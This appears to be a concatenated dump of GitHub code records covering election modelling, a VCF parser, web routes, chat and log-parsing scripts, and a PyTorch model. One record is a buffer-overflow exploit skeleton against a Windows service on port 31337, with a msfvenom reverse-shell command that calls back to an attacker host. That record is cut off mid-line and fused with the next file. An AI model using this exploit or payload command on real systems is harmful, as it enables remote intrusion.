(all_blue_votes/(all_blue_votes+all_red_votes))\n red_vote_percent = (all_red_votes/(all_blue_votes+all_red_votes))\n dem_pop_vote = int(round(voting_population_2020*blue_vote_percent,0))\n rep_pop_vote = int(round(voting_population_2020*red_vote_percent,0))\n dem_state_percentage = round(biden_counter/(biden_counter + trump_counter),4)\n rep_state_percentage = round(trump_counter/(biden_counter + trump_counter),4)\n\n # import Nate Silver 538 result percentages (as of 10/1)\n blue_state_polls_dict = self.probable_outcomes_538_dict[0]\n red_state_polls_dict = self.probable_outcomes_538_dict[1]\n\n # initialize variables for results comparison\n blue_state_polls = list(blue_state_polls_dict.keys())\n blue_state_percentages = list(blue_state_polls_dict.values())\n red_state_polls = list(red_state_polls_dict.keys())\n red_state_percentages = list(red_state_polls_dict.values())\n blue_for_sure = []\n probably_blue = []\n red_for_sure = []\n probably_red = []\n battleground_list = []\n agree_list = []\n disagree_list = []\n middle_ground_blue_list = []\n middle_ground_red_list = []\n\n # identify 538 likely red/likely blue/battleground states\n for i, state in enumerate(blue_state_polls):\n if blue_state_percentages[i] > 85:\n blue_for_sure.append(state)\n elif blue_state_percentages[i] > 65:\n probably_blue.append(state)\n else:\n battleground_list.append(state)\n for j, state in enumerate(red_state_polls):\n if red_state_percentages[j] > 85:\n red_for_sure.append(state)\n elif red_state_percentages[j] > 65:\n probably_red.append(state)\n else:\n battleground_list.append(state)\n\n # cross-reference model results with 538 results\n for state in predicted_blue_states:\n if state in blue_for_sure or state in probably_blue:\n agree_list.append(state)\n elif state in battleground_list:\n if state in blue_state_polls:\n middle_ground_blue_list.append([state, 'BLUE: {}'.format(blue_state_polls_dict[state])])\n elif state in red_state_polls:\n middle_ground_blue_list.append([state, 'RED: {}'.format(red_state_polls_dict[state])])\n else:\n if state in blue_state_polls:\n disagree_list.append([state, blue_state_polls_dict[state]])\n elif state in red_state_polls:\n disagree_list.append([state, red_state_polls_dict[state]])\n for state in predicted_red_states:\n if state in red_for_sure or state in probably_red:\n agree_list.append(state)\n elif state in battleground_list:\n if state in blue_state_polls:\n middle_ground_red_list.append([state, 'BLUE: {}'.format(blue_state_polls_dict[state])])\n elif state in red_state_polls:\n middle_ground_red_list.append([state, 'RED: {}'.format(red_state_polls_dict[state])])\n else:\n if state in blue_state_polls:\n disagree_list.append([state, blue_state_polls_dict[state]])\n elif state in red_state_polls:\n disagree_list.append([state, red_state_polls_dict[state]])\n\n # print election results\n if biden_counter > trump_counter:\n print('BIDEN WINS: {} to {}'.format(biden_counter, trump_counter))\n elif trump_counter > biden_counter:\n print('TRUMP WINS: {} to {}'.format(trump_counter, biden_counter))\n\n # print results of model vs 538 predictions\n print('DISAGREE ON: {}'.format(disagree_list))\n print('MIDDLE GROUND BLUE: {}'.format(middle_ground_blue_list))\n print('MIDDLE GROUND RED: {}'.format(middle_ground_red_list))\n print('BLUE STATES: {}'.format(predicted_blue_states))\n print('RED STATES: {}'.format(predicted_red_states))\n\n # populate file with 2020 plotting results and write to output\n output_list = [winner_dict_2020, percent_dict_2020, biden_counter, trump_counter,\n dem_states_won, rep_states_won, dem_state_percentage, rep_state_percentage,\n 'Biden, Joe', 'Trump, Donald J.', dem_pop_vote, rep_pop_vote]\n with open('election_results_list_2020.txt', 'w') as f:\n for item in output_list:\n f.write(\"%s\\n\" % item)","repo_name":"tristanherink13/Election_Prediction","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":34957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"44660831357","text":"#!/usr/bin/env python3\n\nimport time\nimport sys \nimport os\nimport re \n\n# If the user forgets to put the path to the directory, an error message is printed and the code is terminated \nif len(sys.argv) < 2:\n\tsg.popup('Please provide the path to the directory containing the vcf files as a command line argument !',\n\t\t\t\ttitle = 'ERROR', background_color = 'black', text_color = 'red', font = 50) \n\texit()\n# If the user enters more than on argument after the script file name and the path to the directory, an error message is printed and the code is terminated \nelif len(sys.argv) > 2:\n\tsg.popup('Wrong number of arguments. Make sure to ONLY provide the path to the directory containing containing the vcf files',\n\t\t\t\ttitle = 'ERROR', background_color = 'red', text_color = 'black', font = 50)\n\texit()\n# If the user correctly provides the path to the directory, it is saved in the variable directory_path\nelse:\n\tdirectory_path = sys.argv[1]\n\n# Loops into each of the directory's content \nfor file in os.listdir(directory_path):\n\t# Disregard any item that is not a file \n\tif os.path.isfile(os.path.join(directory_path, file)):\n\n\t\t# Diregard any file that is not a vcf file or zipped file\n\t\tif file.lower().endswith(\".vcf\") or file.lower().endswith(\".vcf.gz\"):\n\t\t\t# Open file in read mode \n\t\t\tcurrent_file = open(directory_path + file, \"r\")\n\t\t\t# Stores the lines of the file in a list, diregarding \\n lines \n\t\t\tfile_lines = [line.rstrip('\\n') for line in current_file]\n\t\t\theader = []\n\t\t\tinfo_meta_info = []\n\t\t\tfilter_meta_info = [] \n\t\t\tformat_meta_info = []\n\t\t\tbody = []\n\n\t\t\tfor line in range(len(file_lines)):\n\t\t\t\tif(re.match('^\\#\\#', file_lines[line], re.MULTILINE)):\n\t\t\t\t\theader.append(line)\n\n\t\t\t\t\tif(re.match('^\\#\\#INFO', file_lines[line], re.MULTILINE)):\n\t\t\t\t\t\tinfo_meta_info.append(file_lines[line])\n\n\t\t\t\t\telif (re.match('^\\#\\#FILTER', file_lines[line], re.MULTILINE)):\n\t\t\t\t\t\tfilter_meta_info.append(file_lines[line])\n\n\t\t\t\t\telif (re.match('^\\#\\#FORMAT', file_lines[line], re.MULTILINE)):\n\t\t\t\t\t\tformat_meta_info.append(file_lines[line])\n\n\t\t\t\telif (re.match('^\\#CHROM', file_lines[line], re.MULTILINE)):\n\t\t\t\t\tfixed_fields = (file_lines[line]).split(\"\\t\")\n\t\t\t\telse:\n\t\t\t\t\tbody.append(file_lines[line])\n\n\t\t\tCHROM = []\n\t\t\tPOS = [] \n\t\t\tID = [] \n\t\t\tREF = [] \n\t\t\tALT = [] \n\t\t\tQUAL = [] \n\t\t\tFILTER = [] \n\t\t\tINFO = []\n\n\t\t\tbody_info = [] \n\t\t\tfor i in body:\n\t\t\t\tbody_info = i.split(\"\\t\")\n\t\t\t\tCHROM.append(body_info[0])\n\t\t\t\tPOS.append(body_info[1])\n\t\t\t\tID.append(body_info[2])\n\t\t\t\tREF.append(body_info[3])\n\t\t\t\tALT.append(body_info[4])\n\t\t\t\tQUAL.append(body_info[5])\n\t\t\t\tFILTER.append(body_info[6])\n\t\t\t\tINFO.append(body_info[7])\n\n\n\n\t\t\t\n\n\n\n\n\n\t\t\t\t\t\t\t\t","repo_name":"melissaelfeghali/Functional-Genomics","sub_path":"NGS Exome Project/NGS_WholeExome_scripts/vcf.py","file_name":"vcf.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13629844161","text":"#!/usr/bin/python\nimport socket, time, struct\n\nip = \"172.16.32.128\"\nport = 31337\n\neip_off = 146\nbuf_supp = 1024\n\n#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.91.129 LPORT=443 -b '\\x00\\x0a' -e x86/shikata_ga_nai -f python EXITFUNC=thread \nbuf = shellcodehere\n\nbuff = ''\nbuff += \"A\" * (eip_off - len(buff))\nbuff += struct.pack(\"\\w+)$', views.EntryListView.as_view(), name='entry-list'),\n re_path(r'^entry/detail/(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n re_path(r'^entry/add/$', views.EntryCreate.as_view(), name='entry-add'),\n re_path(r'^entry/update/(?P[0-9]+)/$', views.EntryUpdate.as_view(), name='entry-update'),\n re_path(r'^api/$', ChartData.as_view()),\n\n # re_path(r'api/chart/dash', ChartsView.as_view(), name='dash'),\n #\n # url(r'api/data/$', DashData.as_view()),\n #\n # url(r'^charts', ChartsView.as_view(), name='charts'),\n #\n # url(r'^api/data/$', get_data, name='api-data'),\n #\n # url(r'entry/(?P[0-9]+)/delete/$', views.EntryDelete.as_view(), name='entry-delete'),\n\n]\n","repo_name":"griggz/MySite","sub_path":"argent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30358015281","text":"import unittest\n\nfrom traitsui.testing.tester._abstract_target_registry import (\n AbstractTargetRegistry,\n)\nfrom traitsui.testing.tester._ui_tester_registry.default_registry import (\n get_default_registries,\n)\n\n\nclass TestDefaultRegistry(unittest.TestCase):\n def test_load_default_registries(self):\n registries = get_default_registries()\n for registry in registries:\n self.assertIsInstance(registry, AbstractTargetRegistry)\n\n self.assertGreaterEqual(len(registries), 1)\n","repo_name":"enthought/traitsui","sub_path":"traitsui/testing/tester/_ui_tester_registry/tests/test_default_registry.py","file_name":"test_default_registry.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":290,"dataset":"github-code","pt":"6"} +{"seq_id":"25963843906","text":"#중복제거 파일 만들기\ncontent = []\n\nf = open(\"C:/Users/HYERIN/PycharmProjects/untitled/text/crawl_blog_food_3_존맛(3300).txt\",\"r\", encoding='utf-8')\nfor i in range(1,10000):\n line = f.readline() #한 줄씩 읽음.\n content.append(line)\n if not line: break # 모두 읽으면 while문 종료.\n\nf.close()\n\nlen(\"before : \", content)\ncontent = list(set(content))\nlen(\"after : \",content)\n\nfile = open(\"C:/Users/HYERIN/PycharmProjects/untitled/text/food.txt\",\"w\", encoding='utf-8')\nfor i in range(1,len(content)):\n file.write(content[i])\nfile.close()\n","repo_name":"2019-graduation-work/keras-modeling","sub_path":"0930text.py","file_name":"0930text.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"29465204283","text":"# Complete the function that accepts a string parameter, and \n# reverses each word in the string. All spaces in the string \n# should be retained.\n\n# Examples\n# \"This is an example!\" ==> \"sihT si na !elpmaxe\"\n# \"double spaces\" ==> \"elbuod secaps\"\n\ndef reverse_words(text):\n #go for it\n\n # create an empty list to hold the reversed words in the text\n reversed_word = []\n \n # loop through the text and split the words into a list\n for words in text.split(' '):\n \n # reverse each word and add it to the created list\n reversed_word.append(words[::-1])\n \n # join the words together and return it.\n return ' '.join(reversed_word)\n\n# import codewars_test as test\n# from solution import reverse_words\n\n# @test.describe(\"Fixed Tests\")\n# def fixed_tests():\n# @test.it('Basic Test Cases')\n# def basic_test_cases():\n# test.assert_equals(reverse_words('The quick brown fox jumps over the lazy dog.'), 'ehT kciuq nworb xof spmuj revo eht yzal .god')\n# test.assert_equals(reverse_words('apple'), 'elppa')\n# test.assert_equals(reverse_words('a b c d'), 'a b c d')\n# test.assert_equals(reverse_words('double spaced words'), 'elbuod decaps sdrow')","repo_name":"tuyojr/code_wars-hacker_rank-leetcode","sub_path":"code_wars/reverse_words.py","file_name":"reverse_words.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39252699410","text":"from urllib.request import urlopen\nimport sys\nfrom bs4 import BeautifulSoup\n\n#print(urlopen('http://www.animeka.com/search/index.html?req=%s' % sys.argv[1]).read())\n\nb = BeautifulSoup(urlopen('http://www.animeka.com/search/index.html?req=%s' % sys.argv[1])) # &go_search=1&cat=search&zone_series=1&zone_episodes=1&zone_studios=1&zone_pers=1&zone_seriesf=1&zone_rlz=1&zone_team=1&type_search=all\nresults = list(b.select('.animestxt a'))\nif len(results) >= 1:\n for line in results:\n print(line['href'])\nelse:\n js = b.find('script').text\n print(js[js.index('\"') + 1:-1])\n","repo_name":"mangaki/mangaki","sub_path":"data/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"6"} +{"seq_id":"2003575319","text":"mynumber = input()\nx=mynumber.isnumeric()\n\nif x == True:\n print(\"Your number is: \\n\" + mynumber)\n\nelif x == False:\n print(\"This is not a number.\\nTry again.\")\n mynumber=input()\n\n\n\n\n# REGEX NA LOGACH\n\n\n# # KROK 1wszy SZUKAMY LINIJEK LOGOW GDZIE JAKIS USER odpalal CRONy\n# KROK 2gi REGEX ZEBY WYLUSKAC USERNAMEy od CRONow\n\nimport sys\nimport re\nlogfile = sys.argv[1] # 1wsza linijka\nwith open(logfile) as f:\n for line in f:\n if \"CRON\" not in line:\n continue\n print(line.strip())\n pattern = r\"USER \\((\\w+)\\)$\"\n result = re.search(pattern,line)\n if result is None:\n continue\n name = result[1]\n usernames[name] = usernames.get(name, 0) +1\n print(result[1])\n\n\n\n#\n# We're using the same syslog, and we want to display the date, time, and process id that's inside the square brackets.\n# We can read each line of the syslog and pass the contents to the show_time_of_pid function. Fill in the gaps to\n# extract the date, time, and process id from the passed line, and return this format: Jul 6 14:01:23 pid:29440.\n#\n# PRZYKLADOWE LOGI\n# Jul 6 14:02:08 computer.name jam_tag=psim[29187]: (UUID:006)\n# Jul 6 14:01:23 computer.name CRON[29440]: USER (good_user)\n# Jul 6 14:02:09 computer.name jam_tag=psim[29187]: (UUID:007)\n\nimport re\ndef show_time_of_pid(line):\n pattern = r\"(\\w+ \\d+ \\d+:\\d+:\\d+)+.*?\\[(\\d+)\\]\"\n result = re.findall(pattern, line)\n return \"{} pid:{}\".format(result[0][0], result[0][1])\n\nprint(show_time_of_pid(\"Jul 6 14:01:23 computer.name CRON[29440]: USER (good_user)\")) # Jul 6 14:01:23 pid:29440\n\nprint(show_time_of_pid(\"Jul 6 14:02:08 computer.name jam_tag=psim[29187]: (UUID:006)\")) # Jul 6 14:02:08 pid:29187\n\nprint(show_time_of_pid(\"Jul 6 14:02:09 computer.name jam_tag=psim[29187]: (UUID:007)\")) # Jul 6 14:02:09 pid:29187\n\nprint(show_time_of_pid(\"Jul 6 14:03:01 computer.name CRON[29440]: USER (naughty_user)\")) # Jul 6 14:03:01 pid:29440\n\nprint(show_time_of_pid(\"Jul 6 14:03:40 computer.name cacheclient[29807]: start syncing from \\\"0xDEADBEEF\\\"\")) # Jul 6 14:03:40 pid:29807\n\nprint(show_time_of_pid(\"Jul 6 14:04:01 computer.name CRON[29440]: USER (naughty_user)\")) # Jul 6 14:04:01 pid:29440\n\nprint(show_time_of_pid(\"Jul 6 14:05:01 computer.name CRON[29440]: USER (naughty_user)\")) # Jul 6 14:05:01 pid:29440","repo_name":"nieonek/crashcoursepython","sub_path":"INP+REGEXLOG.py","file_name":"INP+REGEXLOG.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21413800313","text":"from typing import Union\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends\nfrom starlette.responses import HTMLResponse, RedirectResponse\n\nfrom src.api.forms.plants import PlantCreateForm, PlantEditForm\nfrom src.api.middleware.context import context_middleware\nfrom src.api.middleware.response import TemplateResponse\nfrom src.database.models import Plant\n\nrouter = APIRouter(tags=[\"Plants\"], include_in_schema=False)\n\n\n@router.get(\"/\", status_code=200, response_class=HTMLResponse)\nasync def plants_dashboard(context: dict = Depends(context_middleware)) -> HTMLResponse:\n \"\"\"Displays a list of all plants.\"\"\"\n plants = await Plant.filter(is_accepted=False).prefetch_related(\n \"image\"\n ) # TODO: Change to True\n context[\"plants\"] = plants\n return TemplateResponse(\"plants/dashboard.html\", context)\n\n\n@router.get(\"/plants/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_details(\n pk: UUID, context: dict = Depends(context_middleware)\n) -> HTMLResponse:\n \"\"\"Displays a details of given plant if it exists.\"\"\"\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n await plant.fetch_related(\"creator\", \"image\")\n context[\"plant\"] = plant\n return TemplateResponse(\"plants/details.html\", context)\n\n\n@router.get(\"/plant/create\", status_code=200, response_class=HTMLResponse)\nasync def plant_create_form(\n context: dict = Depends(context_middleware),\n) -> HTMLResponse:\n \"\"\"Displays a plant create from.\"\"\"\n if not context.get(\"user\"):\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n return TemplateResponse(\"plants/create.html\", context)\n\n\n@router.post(\"/plant/create\", status_code=201, response_class=HTMLResponse)\nasync def plant_create(\n form: PlantCreateForm = Depends(),\n) -> Union[HTMLResponse, RedirectResponse]:\n \"\"\"Creates a plant instance based on form data.\"\"\"\n context = form.context.copy()\n if not form.context.get(\"user\"):\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await form.validate()\n if form.errors:\n context[\"errors\"] = form.errors\n return TemplateResponse(\"plants/create.html\", context, 422)\n plant = await form.create()\n return RedirectResponse(f\"/plants/{plant.uuid}\", 302)\n\n\n@router.post(\"/plant/delete/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_delete(\n pk: UUID, context: dict = Depends(context_middleware)\n) -> HTMLResponse:\n \"\"\"Deletes the plant if it exists and given user is its creator.\"\"\"\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n user = context.get(\"user\")\n await plant.fetch_related(\"creator\")\n if not user or not user == plant.creator:\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await plant.delete()\n context[\"messages\"] = [\"Plant has been deleted successfully\"]\n return TemplateResponse(\"plants/create.html\", context, 200)\n\n\n@router.get(\"/plant/edit/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_edit_form(\n pk: UUID, context: dict = Depends(context_middleware)\n) -> HTMLResponse:\n \"\"\"Displays the plant edit form for given plant if correct user is present.\"\"\"\n # TODO: Some `ViewHelper` class should deal with those initial `if` statements\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n user = context.get(\"user\")\n await plant.fetch_related(\"creator\")\n if not user or not user == plant.creator:\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await plant.fetch_related(\"creator\")\n await plant.fetch_related(\"image\")\n context[\"plant\"] = plant\n return TemplateResponse(\"plants/edit.html\", context, 200)\n\n\n@router.post(\"/plant/edit/{pk}\", status_code=200, response_class=HTMLResponse)\nasync def plant_edit(\n pk: UUID,\n form: PlantEditForm = Depends(),\n) -> HTMLResponse:\n \"\"\"Edits given plant with given form data.\"\"\"\n # TODO: Again, `ViewHelper` dependency...\n context = form.context\n plant = await Plant.get_or_none(pk=pk)\n if not plant:\n return TemplateResponse(\"shared/404-page.html\", context, 404)\n user = context.get(\"user\")\n await plant.fetch_related(\"creator\")\n if not user or not user == plant.creator:\n return TemplateResponse(\"shared/403-page.html\", context, 403)\n await form.validate()\n context[\"plant\"] = plant\n if form.errors:\n context[\"errors\"] = form.errors\n return TemplateResponse(\"plants/edit.html\", context, 422)\n await form.update(plant)\n context[\"messages\"] = [\"Plant has been edited successfully!\"]\n return TemplateResponse(\"plants/edit.html\", context, 200)\n","repo_name":"tobias-piotr/check-my-plants","sub_path":"server/src/api/v1/app/plants.py","file_name":"plants.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"29878611616","text":"import socket\r\nimport select\r\nimport sys\r\n\r\nif len(sys.argv)<3:\r\n sys.stdout.write(\"USAGE:chat_client.py hostname port\")\r\n sys.exit()\r\n\r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ns.settimeout(2)\r\ntry:\r\n s.connect((host,port))\r\nexcept:\r\n print(\"unable to connect\")\r\n sys.exit()\r\nprint(\"CONNECTED TO REMOTE HOST,YOU CAN START CHATTING\")\r\nsys.stdout.write('[Me]');sys.stdout.flush()\r\n\r\n \r\nsocketnew = socket.socket()\r\nsocketnew.bind((host,port))\r\n\r\n\r\n\r\nwhile True:\r\n rlist=[s,socketnew]\r\n read_list,w_list,error_list = select.select(rlist,[],[])\r\n\r\n for socket in read_list:\r\n if socket == s:\r\n data = socket.recv(4096)\r\n if data:\r\n sys.stdout.write(data)\r\n sys.stdout.write('[Me]');sys.stdout.flush()\r\n else:\r\n print('Disconnected from server')\r\n sys.exit()\r\n else:\r\n msg=sys.stdin.readline()\r\n socket.send(msg)\r\n sys.stdout.write('[Me]');sys.stdout.flush()\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n","repo_name":"karnvir1576/Chat_Room","sub_path":"chatclient.py","file_name":"chatclient.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13821097826","text":"import torch.nn as nn\nimport torch\nfrom mmdet3d.models import FUSIONMODELS\nfrom mmcv.cnn.bricks.transformer import build_transformer_layer_sequence\n\nfrom mmcv.cnn import build_conv_layer, build_norm_layer\n\nfrom mmcv.cnn.bricks.transformer import build_positional_encoding\nfrom mmdet3d.models.mmim.point_generator import MlvlPointGenerator\n\nfrom mmcv.runner import auto_fp16, force_fp32\nimport math\nimport numpy as np\nimport torch.nn.functional as F\nfrom mmdet3d.models.mmim.deform_fusion_module import MultiScaleDeformableAttention3D\nfrom .base import Base3DFusionModel\n\nfrom typing import Any, Dict \n\nfrom mmdet3d.models.builder import (\n build_backbone,\n build_head,\n build_neck,\n build_voxel_encoder,\n build_vtransform,\n build_middle_encoder,\n)\nfrom mmdet3d.ops import Voxelization, DynamicScatter\n\n\n@FUSIONMODELS.register_module()\nclass UniM2AE_MMIM(Base3DFusionModel):\n def __init__(\n self, \n encoders: Dict[str, Any],\n fusion_module: Dict[str, Any],\n decoder: Dict[str, Any],\n heads: Dict[str, Any],\n **kwargs,\n ):\n super(UniM2AE_MMIM, self).__init__()\n \n self.encoders = nn.ModuleDict()\n if encoders.get(\"camera\") is not None:\n self.encoders[\"camera\"] = nn.ModuleDict(\n {\n \"backbone\": build_backbone(encoders[\"camera\"][\"backbone\"]),\n \"neck\": build_neck(encoders[\"camera\"][\"neck\"]),\n \"vtransform\": build_vtransform(encoders[\"camera\"][\"vtransform\"]),\n }\n )\n if encoders.get(\"lidar\") is not None:\n if encoders[\"lidar\"][\"voxelize\"].get(\"max_num_points\", -1) > 0 or \\\n encoders[\"lidar\"][\"voxelize\"].get(\"Voxelization\", False):\n if 'Voxelization' in encoders[\"lidar\"][\"voxelize\"]:\n encoders[\"lidar\"][\"voxelize\"].pop(\"Voxelization\")\n voxelize_module = Voxelization(**encoders[\"lidar\"][\"voxelize\"])\n else:\n voxelize_module = DynamicScatter(**encoders[\"lidar\"][\"voxelize\"])\n self.encoders[\"lidar\"] = nn.ModuleDict(\n {\n \"voxelize\": voxelize_module,\n \"voxel_encoder\": build_voxel_encoder(encoders[\"lidar\"][\"voxel_encoder\"]) if encoders[\"lidar\"].get(\"voxel_encoder\", None) else None,\n \"middle_encoder\": build_middle_encoder(encoders[\"lidar\"][\"middle_encoder\"]) if encoders[\"lidar\"].get(\"middle_encoder\", None) else None,\n \"backbone\": build_backbone(encoders[\"lidar\"][\"backbone\"]),\n }\n )\n self.voxelize_reduce = encoders[\"lidar\"].get(\"voxelize_reduce\", True)\n\n self.decoder = nn.ModuleDict(\n {\n \"backbone\": build_backbone(decoder[\"backbone\"]),\n \"neck\": build_neck(decoder[\"neck\"]),\n }\n )\n self.heads = nn.ModuleDict()\n for name in heads:\n if heads[name] is not None:\n self.heads[name] = build_head(heads[name])\n\n if \"loss_scale\" in kwargs:\n self.loss_scale = kwargs[\"loss_scale\"]\n else:\n self.loss_scale = dict()\n for name in heads:\n if heads[name] is not None:\n self.loss_scale[name] = 1.0\n \n norm_cfg=dict(type='GN', num_groups=16, requires_grad=True)\n conv_cfg=dict(type='Conv3d', bias=False)\n \n self.deblock_camera = nn.Sequential(\n build_conv_layer(conv_cfg,\n in_channels=80,\n out_channels=192,\n kernel_size=3,\n stride=2,\n padding=1),\n build_norm_layer(norm_cfg, 192)[1],\n nn.ReLU(inplace=True),\n )\n \n self.deblock_lidar = nn.Sequential(\n build_conv_layer(\n conv_cfg,\n in_channels=128,\n out_channels=192,\n kernel_size=3,\n stride=2,\n padding=1\n ),\n build_norm_layer(norm_cfg, 192)[1],\n nn.ReLU(inplace=True),\n )\n\n self.deblock_fusion = nn.Sequential(\n nn.Conv2d(384, 192, kernel_size=1, stride=1, bias=False),\n build_norm_layer(dict(type='BN', eps=1.0e-3, momentum=0.01), 192)[1],\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(192, 192, kernel_size=2, stride=2, bias=False),\n build_norm_layer(dict(type='BN', eps=1.0e-3, momentum=0.01), 192)[1],\n nn.ReLU(inplace=True),\n nn.Conv2d(192, 128, kernel_size=1, stride=1, bias=False),\n build_norm_layer(dict(type='BN', eps=1.0e-3, momentum=0.01), 128)[1],\n nn.ReLU(inplace=True),\n )\n \n self.postional_encoding = build_positional_encoding(fusion_module[\"positional_encoding\"])\n self.strides = fusion_module[\"strides\"]\n self.num_encoder_levels = fusion_module[\"encoder\"].transformerlayers.attn_cfgs.num_levels\n self.level_encoding = nn.Embedding(self.num_encoder_levels, fusion_module[\"embed_dims\"])\n self.point_generator = MlvlPointGenerator(self.strides)\n self.fuser = build_transformer_layer_sequence(fusion_module[\"encoder\"])\n self.relu1 = nn.ReLU(inplace=True)\n self.relu2 = nn.ReLU(inplace=True)\n \n self.init_weights()\n\n def init_weights(self):\n if \"camera\" in self.encoders:\n self.encoders[\"camera\"][\"backbone\"].init_weights()\n \n for p in self.fuser.parameters():\n if p.dim() > 1:\n nn.init.xavier_normal_(p)\n\n for layer in self.fuser.layers:\n for attn in layer.attentions:\n if isinstance(attn, MultiScaleDeformableAttention3D):\n attn.init_weights()\n \n def volume_vtransform_embed(self, camera_x, img_metas):\n B, N, C, H, W = camera_x.shape\n dtype = camera_x.dtype\n volume_queries = self.volume_embedding.weight.to(dtype)\n \n volume_queries = volume_queries.unsqueeze(1).repeat(1, B, 1)\n view_features = self.transfer_conv(camera_x.view(B*N, C, H, W))\n view_features = view_features.view(B, N, -1, H, W).flatten(3).permute(1, 0, 3, 2)\n view_features = view_features + self.cams_embeds[:, None, None, :].to(view_features.dtype)\n view_features = view_features + self.level_embeds[None, None, 0:1, :].to(view_features.dtype)\n spatial_shapes = torch.as_tensor([[H, W]], dtype=torch.long, device=view_features.device)\n level_start_index = spatial_shapes.new_zeros((1,))\n view_features = view_features.permute(0, 2, 1, 3)\n \n volume_embed = self.encoders[\"camera\"][\"vtransform\"](\n volume_queries,\n view_features,\n view_features,\n volume_h=self.volume_h,\n volume_w=self.volume_w,\n volume_z=self.volume_z,\n spatial_shapes=spatial_shapes,\n level_start_index=level_start_index,\n img_metas=img_metas\n ).reshape(B, self.volume_z, self.volume_h, self.volume_w, -1).permute(0, 4, 3, 2, 1)\n \n volume_embed = self.deblock_camera(volume_embed)\n\n return volume_embed\n \n def fusion_module(self, volume_feats):\n batch_size, C, W, H, Z = volume_feats[0].shape\n \n encoder_inputs_list = []\n padding_mask_list = []\n level_positional_encoding_list = []\n spatial_shape_list = []\n reference_points_list = []\n \n for i in range(self.num_encoder_levels):\n feat = volume_feats[i]\n # X, Y, Z\n volume_shape = volume_feats[i].shape[-3:]\n padding_mask_resized = feat.new_zeros((batch_size,)+volume_shape, \n dtype=torch.bool)\n pos_embed = self.postional_encoding(padding_mask_resized)\n level_embed = self.level_encoding.weight[i]\n level_pos_embed = level_embed.view(1, -1, 1, 1, 1) + pos_embed\n \n reference_points = self.point_generator.single_level_grid_priors(\n volume_shape, i, device=feat.device)\n \n factor = feat.new_tensor([volume_shape[::-1]]) * self.strides[i]\n reference_points = reference_points / factor\n \n volume_projected = feat.flatten(2).permute(2, 0, 1)\n level_pos_embed = level_pos_embed.flatten(2).permute(2, 0, 1)\n padding_mask_resized = padding_mask_resized.flatten(1)\n \n encoder_inputs_list.append(volume_projected)\n padding_mask_list.append(padding_mask_resized)\n level_positional_encoding_list.append(level_pos_embed)\n spatial_shape_list.append(volume_shape)\n reference_points_list.append(reference_points)\n \n padding_mask = torch.cat(padding_mask_list, dim=1)\n spatial_shapes = torch.as_tensor(spatial_shape_list, dtype=torch.long, device=volume_feats[0].device)\n level_start_index = torch.cat((spatial_shapes.new_zeros(\n (1, )), spatial_shapes.prod(1).cumsum(0)[:-1]))\n reference_points = torch.cat(reference_points_list, dim=0)\n reference_points = reference_points[None, :, None].repeat(\n batch_size, 1, self.num_encoder_levels, 1)\n valid_radios = reference_points.new_ones(\n (batch_size, self.num_encoder_levels, 2))\n encoder_inputs = torch.cat(encoder_inputs_list, dim=0)\n level_positional_encodings = torch.cat(level_positional_encoding_list, dim=0)\n \n volume_feat = self.fuser(\n query=encoder_inputs,\n key=None,\n value=None,\n query_pos=level_positional_encodings,\n key_pos=None,\n attn_masks=None,\n key_padding_mask=None,\n query_key_padding_mask=padding_mask,\n spatial_shapes=spatial_shapes,\n reference_points=reference_points,\n level_start_index=level_start_index,\n valid_radios=valid_radios\n )\n \n lidar_feat, camera_feat = torch.split(volume_feat, level_start_index[1])\n \n lidar_feat = lidar_feat.permute(1, 2, 0).view(batch_size, -1, W, H, Z)\n lidar_feat = self.relu1(lidar_feat+volume_feats[0])\n camera_feat = camera_feat.permute(1, 2, 0).view(batch_size, -1, W, H, Z)\n camera_feat = self.relu2(camera_feat+volume_feats[1])\n \n return lidar_feat, camera_feat\n \n def extract_camera_features(\n self, \n x, \n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n img_metas\n ) -> torch.Tensor:\n B, N, C, H, W = 